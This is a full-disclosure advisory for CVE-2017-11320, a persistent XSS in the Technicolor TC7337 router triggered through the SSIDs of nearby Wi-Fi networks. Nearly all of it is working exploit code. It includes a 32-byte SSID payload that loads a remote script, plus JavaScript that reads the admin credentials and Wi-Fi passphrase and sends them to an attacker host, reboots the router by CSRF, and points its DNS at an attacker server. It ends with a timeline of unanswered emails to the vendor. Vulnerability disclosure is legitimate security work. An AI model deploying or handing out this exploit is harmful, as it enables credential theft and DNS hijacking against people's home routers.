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[CVE-2017-11320] Persistent XSS through the SSID of nearby Wi-Fi devices on Technicolor TC7337


From: Geolado giolado <g3ol4d0 () gmail com>
Date: Wed, 2 Aug 2017 17:37:04 -0300

// Device : Technicolor TC7337
// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
// XSS through SSID : '><script src=//url.co></script>   ( Exactly 32
bytes u_u )
//                             ^
//  5char domains are running  |    'src' does not requires quotes ,
and passing the URL with ony '//'
//  out, grab yours !          +---> it will cause the browser to make
the request with the current protocol,
//                                   which is HTTP , duh
// Below is the content of url.co/index.html
// index.html ( which is just a JavaScript actually, but we have to
use the index to fit the 32 chars ) :

function get_passwords(attackers_server) {
        // attackers_server = server to send the credentials
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        // XSS to get Admin's login/passwd + Wifi passphrase
        // from backup settings

        xmlhttp=new XMLHttpRequest();
        xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
        xmlhttp.send();
        var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's
Login and Password
        var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for
Wifi PassPhrase
        // Add a img requesting the attacker website with the leaked
passwords in the GET parameters
        document.write('<img src="'+attackers_server+'?net='+
encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">');
}

function reboot_router() {
        // XSS + CSRF reboot router
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        // Why? Because It's fun to watch a XSS doing 'physical' stuff

        xmlhttp=new XMLHttpRequest();
        xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of
the reset interface
        xmlhttp.send();
        var w = xmlhttp.responseText.indexOf("Key") ; // Search for the
SessionKey, some sort of CSRF Token
        var sessionKey =
xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex
because the key is inside quotes

        xmlhttp=new XMLHttpRequest();
        xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false);
// Request the reboot page with the CSRF token
        xmlhttp.send();
}

function dns_poisoning(attackers_dns) {
        // attackers_dns = malicious DNS Server
        // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit
my code is ugly as fuck , sorry world
        // Alter the DNS Config of the Router
        // changing the Primary and Secondary DNS to the attacker's one

        xmlhttp=new XMLHttpRequest();   
        xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
        xmlhttp.send();
        var w = xmlhttp.responseText.indexOf("Key") ; // Search for the
SessionKey, some sort of CSRF Token
        var sessionKey =
xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex
because the key is inside quotes
        var i_wanip = xmlhttp.responseText.indexOf("wanip") ;
        var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1]
;
        var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet") ;
        var wansubnet =
xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1]
;
        var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip") ;
        var wangatewayip =
xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1]
;

        xmlhttp=new XMLHttpRequest();
        xmlhttp.open("GET",
"/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey,
false);
        xmlhttp.send(); // Send the request to SAVE the Primary and Secondary
DNS with the CSRF Token

        //After saving we need to apply the settings. yeah, fuck logic --'

        //Getting a brand NEW SessionKey
        xmlhttp=new XMLHttpRequest();   
        xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
        xmlhttp.send();
        var w = xmlhttp.responseText.indexOf("Key") ; // Search for the
SessionKey, some sort of CSRF Token
        var sessionKey =
xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex
because the key is inside quotes

        xmlhttp=new XMLHttpRequest();   
        xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false);
// GET the apply DNS page
        xmlhttp.send();
}

//Choose your path !
//get_passwords("https://evil.domain/";) ;
//reboot_router();
dns_poisoning("1.3.3.7")

// TimeLine
// ---------
// 08/07/2017 - First email sent to the vendor (no answer)
// 16/07/2017 - Second email sent to the vendor (no answer)
// 18/07/2017 - Third email sent to the vendor (no answer)
// 02/08/2017 - Full Disclosure

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